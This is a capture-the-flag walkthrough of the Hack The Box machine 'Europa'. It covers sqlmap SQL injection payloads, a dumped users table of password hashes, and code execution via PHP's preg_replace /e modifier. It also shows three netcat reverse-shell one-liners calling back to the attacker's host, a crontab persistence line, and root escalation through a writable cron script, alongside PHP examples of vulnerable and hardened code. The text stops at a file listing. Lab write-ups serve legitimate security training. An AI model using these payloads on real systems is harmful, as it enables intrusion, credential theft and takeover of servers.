Europa
Ports scan
u505@kali:~/HTB/Machines/Haircut$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.22
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-05-07 18:36:09 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.22
Discovered open port 22/tcp on 10.10.10.22
Discovered open port 443/tcp on 10.10.10.22

u505@kali:~/HTB/Machines/Haircut$ nmap -sC -sV 10.10.10.22
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 14:36 EDT
Nmap scan report for europa.htb (10.10.10.22)
Host is up (0.038s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
|   256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_  256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after:  2027-04-17T09:06:22
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds
SSLScan
u505@kali:~/HTB/Machines/Europa$ sslscan --show-certificate https://admin-portal.europacorp.htb/
Version: 2.0.0-static
OpenSSL 1.1.1f-dev  xx XXX xxxx

Connected to 10.10.10.22

Testing SSL server admin-portal.europacorp.htb on port 443 using SNI name admin-portal.europacorp.htb

  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     disabled
TLSv1.0   enabled
TLSv1.1   enabled
TLSv1.2   enabled
TLSv1.3   disabled

  TLS Fallback SCSV:
Server supports TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLSv1.2 not vulnerable to heartbleed
TLSv1.1 not vulnerable to heartbleed
TLSv1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-GCM-SHA384     DHE 2048 bits
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 2048 bits
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA256         DHE 2048 bits
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Preferred TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Preferred TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits

  Server Key Exchange Group(s):
TLSv1.2  141 bits  sect283k1
TLSv1.2  141 bits  sect283r1
TLSv1.2  204 bits  sect409k1
TLSv1.2  204 bits  sect409r1
TLSv1.2  285 bits  sect571k1
TLSv1.2  285 bits  sect571r1
TLSv1.2  128 bits  secp256k1
TLSv1.2  128 bits  secp256r1 (NIST P-256)
TLSv1.2  192 bits  secp384r1 (NIST P-384)
TLSv1.2  260 bits  secp521r1 (NIST P-521)
TLSv1.2  128 bits  brainpoolP256r1
TLSv1.2  192 bits  brainpoolP384r1
TLSv1.2  256 bits  brainpoolP512r1

  Server Signature Algorithm(s):
TLSv1.2  rsa_pkcs1_sha1
TLSv1.2  dsa_sha1
TLSv1.2  ecdsa_sha1
TLSv1.2  rsa_pkcs1_sha224
TLSv1.2  dsa_sha224
TLSv1.2  ecdsa_sha224
TLSv1.2  rsa_pkcs1_sha256
TLSv1.2  dsa_sha256
TLSv1.2  ecdsa_secp256r1_sha256
TLSv1.2  rsa_pkcs1_sha384
TLSv1.2  dsa_sha384
TLSv1.2  ecdsa_secp384r1_sha384
TLSv1.2  rsa_pkcs1_sha512
TLSv1.2  dsa_sha512
TLSv1.2  ecdsa_secp521r1_sha512
  SSL Certificate:
Certificate blob: [PEM block omitted]
Version: 2
Serial Number: f1:a1:30:fe:05:b6:24:c2
Signature Algorithm: sha256WithRSAEncryption
Issuer: /C=GR/ST=Attica/L=Athens/O=EuropaCorp Ltd./OU=IT/CN=europacorp.htb/emailAddress=admin@europacorp.htb
Not valid before: Apr 19 09:06:22 2017 GMT
Not valid after: Apr 17 09:06:22 2027 GMT
Subject: /C=GR/ST=Attica/L=Athens/O=EuropaCorp Ltd./OU=IT/CN=europacorp.htb/emailAddress=admin@europacorp.htb
Public Key Algorithm: NULL
RSA Public Key: (3072 bit)
    RSA Public-Key: (3072 bit)
    Modulus: [hex dump omitted]
    Exponent: 65537 (0x10001)
X509v3 Extensions:
    X509v3 Subject Key Identifier: 9D:C3:4F:60:FE:24:6C:68:AB:7C:47:5D:FB:3D:1A:53:01:FB:93:81
    X509v3 Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
    X509v3 Authority Key Identifier: keyid:9D:C3:4F:60:FE:24:6C:68:AB:7C:47:5D:FB:3D:1A:53:01:FB:93:81
    X509v3 Basic Constraints: CA:TRUE
    X509v3 Key Usage: Digital Signature, Key Encipherment
Verify Certificate: unable to get local issuer certificate
  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    3072

Subject:  europacorp.htb
Altnames: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
Issuer:   europacorp.htb

Not valid before: Apr 19 09:06:22 2017 GMT
Not valid after:  Apr 17 09:06:22 2027 GMT
Web server port 80
The default Apache page.
Web server port 443
The default Apache page.
Web server admin-portal port 443
This time we find a login page.
Sqlmap
We check whether the login page is vulnerable to SQL injection.
Login with an email address and a password.
Burp intercepts the request.
u505@kali:~/HTB/Machines/Europa$ cat login.req
POST /login.php HTTP/1.1
Host: admin-portal.europacorp.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin-portal.europacorp.htb/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Connection: close
Cookie: PHPSESSID=54cc5abuoe6iel56vd08vqpgo0
Upgrade-Insecure-Requests: 1

email=admin%40gmail.com&password=admin
Run sqlmap
u505@kali:~/HTB/Machines/Europa$ sqlmap -r login.req --force-ssl
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.4#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:38:54 /2020-05-10/

[09:38:54] [INFO] parsing HTTP request from 'login.req'
[09:38:54] [INFO] testing connection to the target URL
[09:38:54] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:38:55] [INFO] testing if the target URL content is stable
[09:38:55] [INFO] target URL content is stable
[09:38:55] [INFO] testing if POST parameter 'email' is dynamic
[09:38:55] [WARNING] POST parameter 'email' does not appear to be dynamic
[09:38:55] [INFO] heuristic (basic) test shows that POST parameter 'email' might be injectable (possible DBMS: 'MySQL')
[09:38:56] [INFO] heuristic (XSS) test shows that POST parameter 'email' might be vulnerable to cross-site scripting (XSS) attacks
[09:38:56] [INFO] testing for SQL injection on POST parameter 'email'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[09:39:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:39:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:39:12] [INFO] testing 'Generic inline queries'
[09:39:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:39:22] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:39:23] [WARNING] reflective value(s) found and filtering out
[09:39:31] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:39:40] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:39:42] [INFO] POST parameter 'email' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --string="beta")
[09:39:42] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:39:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:39:42] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:39:43] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:39:43] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:39:43] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:39:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:39:44] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:39:44] [INFO] POST parameter 'email' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:39:44] [INFO] testing 'MySQL inline queries'
[09:39:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:39:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:39:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:39:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:39:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:39:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:39:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:39:56] [INFO] POST parameter 'email' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:39:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:39:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:39:56] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:39:57] [INFO] target URL appears to have 5 columns in query
got a 302 redirect to 'https://admin-portal.europacorp.htb/dashboard.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] n
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N]
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[09:41:19] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[09:41:24] [INFO] target URL appears to be UNION injectable with 5 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[09:41:47] [INFO] testing 'MySQL UNION query (86) - 21 to 40 columns'
[09:41:52] [INFO] testing 'MySQL UNION query (86) - 41 to 60 columns'
[09:41:56] [INFO] testing 'MySQL UNION query (86) - 61 to 80 columns'
[09:42:00] [INFO] testing 'MySQL UNION query (86) - 81 to 100 columns'
POST parameter 'email' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 345 HTTP(s) requests:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: email=admin@gmail.com' RLIKE (SELECT (CASE WHEN (5017=5017) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- edbI&password=admin

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: email=admin@gmail.com' OR (SELECT 3432 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (ELT(3432=3432,1))),0x716b767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tfIz&password=admin

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=admin@gmail.com' AND (SELECT 9458 FROM (SELECT(SLEEP(5)))uDsZ)-- MDKu&password=admin
---
[09:42:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:42:13] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 09:42:13 /2020-05-10/
sqlmap did a really good job. Once one of its payloads logs in, the PHPSESSID cookie sent in login.req is authenticated, so we can access the dashboard with it.
u505@kali:~/HTB/Machines/Europa$ sqlmap -r login.req --force-ssl --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:42:40 /2020-05-10/

[09:42:40] [INFO] parsing HTTP request from 'login.req'
[09:42:40] [INFO] resuming back-end DBMS 'mysql'
[09:42:40] [INFO] testing connection to the target URL
got a 302 redirect to 'https://admin-portal.europacorp.htb/dashboard.php'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: email=admin@gmail.com' RLIKE (SELECT (CASE WHEN (5017=5017) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- edbI&password=admin

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: email=admin@gmail.com' OR (SELECT 3432 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (ELT(3432=3432,1))),0x716b767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tfIz&password=admin

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=admin@gmail.com' AND (SELECT 9458 FROM (SELECT(SLEEP(5)))uDsZ)-- MDKu&password=admin
---
[09:42:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:42:47] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:42:47] [INFO] fetching current database
[09:42:47] [INFO] retrieved: 'admin'
[09:42:47] [INFO] fetching tables for database: 'admin'
[09:42:48] [INFO] retrieved: 'users'
[09:42:48] [INFO] fetching columns for table 'users' in database 'admin'
[09:42:48] [INFO] retrieved: 'id'
[09:42:48] [INFO] retrieved: 'int(11)'
[09:42:49] [INFO] retrieved: 'username'
[09:42:49] [INFO] retrieved: 'varchar(255)'
[09:42:49] [INFO] retrieved: 'email'
[09:42:49] [INFO] retrieved: 'varchar(255)'
[09:42:49] [INFO] retrieved: 'password'
[09:42:50] [INFO] retrieved: 'varchar(255)'
[09:42:50] [INFO] retrieved: 'active'
[09:42:50] [INFO] retrieved: 'tinyint(1)'
[09:42:50] [INFO] fetching entries for table 'users' in database 'admin'
[09:42:51] [INFO] retrieved: '1'
[09:42:51] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'
[09:42:51] [INFO] retrieved: '1'
[09:42:51] [INFO] retrieved: 'admin@europacorp.htb'
[09:42:52] [INFO] retrieved: 'administrator'
[09:42:52] [INFO] retrieved: '2'
[09:42:52] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'
[09:42:52] [INFO] retrieved: '1'
[09:42:52] [INFO] retrieved: 'john@europacorp.htb'
[09:42:53] [INFO] retrieved: 'john'
[09:42:53] [INFO] recognized possible password hashes in column '`password`'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: admin
Table: users
[2 entries]
+------+----------------------+--------+---------------+----------------------------------+
| id   | email                | active | username      | password                         |
+------+----------------------+--------+---------------+----------------------------------+
| 1    | admin@europacorp.htb | 1      | administrator | 2b6d315337f18617ba18922c0b9597ff |
| 2    | john@europacorp.htb  | 1      | john          | 2b6d315337f18617ba18922c0b9597ff |
+------+----------------------+--------+---------------+----------------------------------+

[09:43:05] [INFO] table '`admin`.users' dumped to CSV file '/home/u505/.sqlmap/output/admin-portal.europacorp.htb/dump/admin/users.csv'
[09:43:05] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 09:43:05 /2020-05-10/
Alternative Manual SQL Injection
Sqlmap gets us straight to the dashboard even with a wrong email. With the correct email, we can easily log on to the application by hand.
The email field is only validated on the client side, so we submit the form with the correct email and tamper with the request in Burp.
We access the dashboard.
Crack the password
Another way to log in is to crack the hash found by sqlmap. Hashcat did not crack it with the rockyou or Collection1 wordlists, but it is known to online hash lookup sites.
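The login weakness sqlmap found and the weak password storage, as an added example that is not the box's own login.php (its source is not on the page): the string-built query beside a prepared-statement version with proper password hashing and session handling. It assumes the db.php connection shown later in this writeup and the users table columns dumped above; the 32-hex-character password values are assumed to be unsalted MD5.

```php
<?php
// Added example; the box's real login.php is not shown on the page.
// Assumes db.php (shown later in the writeup) has created $connection and
// that the users table has the columns id, username, email, password, active.
require __DIR__ . '/db.php';

// Vulnerable form (reconstruction of what sqlmap's findings imply): the email
// value is pasted into the SQL text, so a quote in it rewrites the WHERE
// clause; the password is compared as an unsalted MD5 (assumption based on
// the 32-hex-character values in the dump). Do not use.
function login_vulnerable(mysqli $connection, string $email, string $password): ?array
{
    $hash  = md5($password);
    $query = "SELECT id, username FROM users "
           . "WHERE email = '$email' AND password = '$hash' AND active = 1";
    $result = mysqli_query($connection, $query);
    $row = $result ? mysqli_fetch_assoc($result) : null;
    return $row ?: null;
}

// Hardened form: the email is a bound parameter (never part of the SQL text),
// the e-mail format is checked server side instead of only in the browser,
// and the password is checked with password_verify() against a value that
// was stored with password_hash().
function login_hardened(mysqli $connection, string $email, string $password): ?array
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    $stmt = mysqli_prepare(
        $connection,
        'SELECT id, username, password FROM users WHERE email = ? AND active = 1'
    );
    if ($stmt === false) {
        return null;
    }
    mysqli_stmt_bind_param($stmt, 's', $email);
    mysqli_stmt_execute($stmt);
    $row = mysqli_fetch_assoc(mysqli_stmt_get_result($stmt));
    mysqli_stmt_close($stmt);

    // Existing MD5 rows must be re-hashed with password_hash() on migration:
    // password_verify() rejects a bare MD5 string, which is not a valid hash.
    if (!$row || !password_verify($password, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $user = login_hardened($connection, $_POST['email'] ?? '', $_POST['password'] ?? '');
    if ($user === null) {
        http_response_code(401);
        exit('Invalid credentials');
    }
    session_start();
    // Issue a fresh PHPSESSID after authentication, so a session id that was
    // known before login (like the one in login.req) is not the one that
    // becomes authenticated.
    session_regenerate_id(true);
    $_SESSION['user'] = $user;
    header('Location: /dashboard.php', true, 302);
    exit;
}
```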
Tools page
The dashboard page gives no hints, except for the tools page.
If we fill the field with a value, it is reflected in the response.
The parameter pattern appears to be a regular expression that is applied to the value of the parameter ipaddress.
If pattern is local-address and ipaddress is system('whoami'), the text is replaced, but nothing is executed.
PHP PCRE (Perl Compatible Regular Expressions) functions can be exploited through the /e modifier of preg_replace(), which evaluates the replacement string as PHP code after substitution. If we add the e modifier to the pattern, the text local-address is replaced by www-data, the output of executing system('whoami'). The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this only works because the box runs an older PHP.
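What the tools page does with pattern and ipaddress, reconstructed as an added example that is not the box's own tools.php (its source is not on the page), with the vulnerable call beside two hardened forms. The template text, the parameter handling and the placeholder name are assumptions taken from the behaviour described above.

```php
<?php
// Added example, not the box's tools.php (its source is not on the page).
// Reconstructs the behaviour observed above: the `pattern` parameter is used
// as the regex and `ipaddress` as the replacement, applied to a config
// template that contains the placeholder text "local-address". The template
// text and the parameter handling are assumptions.

$template = "remote-address 10.10.10.22\nlocal-address 0.0.0.0\n";  // constructed sample

// Vulnerable form. On PHP < 7.0 a pattern ending in the e modifier, such as
// "/local-address/e", makes preg_replace() eval() the replacement after
// substitution, so the `ipaddress` value is run as PHP code. PHP >= 7.0
// refuses the e modifier and returns null with a warning.
function apply_pattern_vulnerable(string $template, string $pattern, string $replacement): string
{
    return (string) preg_replace($pattern, $replacement, $template);
}

// Hardened form 1: the feature only ever swaps a fixed placeholder for an
// address, so no regular expression is needed at all; validate the address
// and do a plain string replace.
function apply_address(string $template, string $ipaddress): string
{
    if (filter_var($ipaddress, FILTER_VALIDATE_IP) === false) {
        throw new InvalidArgumentException('ipaddress is not an IP address');
    }
    return str_replace('local-address', $ipaddress, $template);
}

// Hardened form 2, if a user-chosen regex really is required: accept only
// "/body/" with '/' as the delimiter and modifiers from a fixed harmless set
// (so 'e' can never appear), and apply it through preg_replace_callback(),
// which never interprets the replacement as code and also keeps $1 / \1
// back-references in the replacement literal. A user regex can still be slow
// to match (catastrophic backtracking), so keep pcre.backtrack_limit low.
function apply_pattern_checked(string $template, string $pattern, string $replacement): string
{
    if (!preg_match('#^/(?:[^/\\\\]|\\\\.)*/[imsux]*$#', $pattern)) {
        throw new InvalidArgumentException('pattern rejected');
    }
    $out = preg_replace_callback(
        $pattern,
        static function (array $match) use ($replacement): string { return $replacement; },
        $template
    );
    if ($out === null) {
        throw new RuntimeException('regex error ' . preg_last_error());
    }
    return $out;
}

// Constructed usage: the replacement the page describes, and the e-modifier
// request from the page rejected before it reaches the PCRE functions.
echo apply_address($template, '10.10.14.21');
echo apply_pattern_checked($template, '/local-address/i', '10.10.14.21');
try {
    apply_pattern_checked($template, '/local-address/e', "system('whoami')");
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```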
Reverse shell
We start a listener.
u505@kali:~/HTB/Machines/Europa$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Creation of a simple reverse shell script.
u505@kali:~/HTB/Machines/Europa/www$ cat shell.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 4444 >/tmp/f
Start the web server.
u505@kali:~/HTB/Machines/Europa/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
The first step is to download the shell script on the target and save it in /tmp/shell.sh; the request shows up in the web server log.
10.10.10.22 - - [10/May/2020 13:38:33] "GET /shell.sh HTTP/1.1" 200 -
Second step, we call our shell.
u505@kali:~/HTB/Machines/Europa$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.22.
Ncat: Connection from 10.10.10.22:59830.
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@europa:/var/www/admin$ stty raw -echo
stty raw -echo
User Flag
The user flag is readable as the www-data user.
www-data@europa:/var/www/admin$ cat /home/john/user.txt
<USER_FLAG>
Enumeration
DB
We can access the DB with the credentials in db.php, but we already found this information with sqlmap.
www-data@europa:/var/www/admin$ cat db.php
<?php
$connection = mysqli_connect('localhost', 'john', 'iEOERHRiDnwkdnw');
if (!$connection){
    die("Database Connection Failed" . mysqli_error($connection));
}
$select_db = mysqli_select_db($connection, 'admin');
if (!$select_db){
    die("Database Selection Failed" . mysqli_error($connection));
}
www-data@europa:/var/www/admin$ mysql -u john -p
Enter password: iEOERHRiDnwkdnw
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3644
Server version: 5.7.18-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use admin
use admin
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------+
| Tables_in_admin |
+-----------------+
| users           |
+-----------------+
1 row in set (0.00 sec)

mysql> select * from users;
select * from users;
+----+---------------+----------------------+----------------------------------+--------+
| id | username      | email                | password                         | active |
+----+---------------+----------------------+----------------------------------+--------+
|  1 | administrator | admin@europacorp.htb | 2b6d315337f18617ba18922c0b9597ff |      1 |
|  2 | john          | john@europacorp.htb  | 2b6d315337f18617ba18922c0b9597ff |      1 |
+----+---------------+----------------------+----------------------------------+--------+
2 rows in set (0.00 sec)
cronjob
The file clearlogs in the cronjobs folder suggests that a cronjob runs periodically on this server. It empties the access log and then runs /var/www/cmd/logcleared.sh.
www-data@europa:/var/www/cronjobs$ cat clearlogs
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>
We open a second shell to analyze the processes with pspy.
u505@kali:~/HTB/Machines/Europa$ rlwrap nc -lnvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
We create the second shell file.
www-data@europa:/tmp$ cat shell2
rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.10.14.21 4445 >/tmp/g
We add a crontab line to execute our shell every minute.
www-data@europa:/tmp$ echo "* * * * * sh /tmp/shell2" | crontab
echo "* * * * * sh /tmp/shell2" | crontab
www-data@europa:/tmp$ crontab -l
crontab -l
* * * * * sh /tmp/shell2
Within a minute, the second shell is opened.
u505@kali:~/HTB/Machines/Europa$ rlwrap nc -lnvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.22.
Ncat: Connection from 10.10.10.22:34134.
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@europa:~$ stty raw -echo
stty raw -echo
www-data@europa:~$ cd /tmp
www-data@europa:/tmp$ wget -q http://10.10.14.21/pspy64
www-data@europa:/tmp$ chmod +x pspy64
www-data@europa:/tmp$ ./pspy64
As expected, a cronjob is launched every minute as root (UID=0).
2020/05/10 21:15:01 CMD: UID=0 PID=3709 | /bin/sh -c /var/www/cronjobs/clearlogs
Escalation of privileges
We open a third listener.
u505@kali:~/HTB/Machines/Europa$ rlwrap nc -lnvp 4446
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
We create the file logcleared.sh, which does not exist yet. Since /var/www/cmd is writable by www-data, root's cronjob will execute whatever we put there.
www-data@europa:/tmp$ echo "rm /tmp/h;mkfifo /tmp/h;cat /tmp/h|/bin/sh -i 2>&1|nc 10.10.14.21 4446 >/tmp/h" > /var/www/cmd/logcleared.sh
www-data@europa:/tmp$ chmod +x /var/www/cmd/logcleared.sh
www-data@europa:/tmp$ cat /var/www/cmd/logcleared.sh
rm /tmp/h;mkfifo /tmp/h;cat /tmp/h|/bin/sh -i 2>&1|nc 10.10.14.21 4446 >/tmp/h
www-data@europa:/tmp$ ls -l /var/www/cmd/logcleared.sh
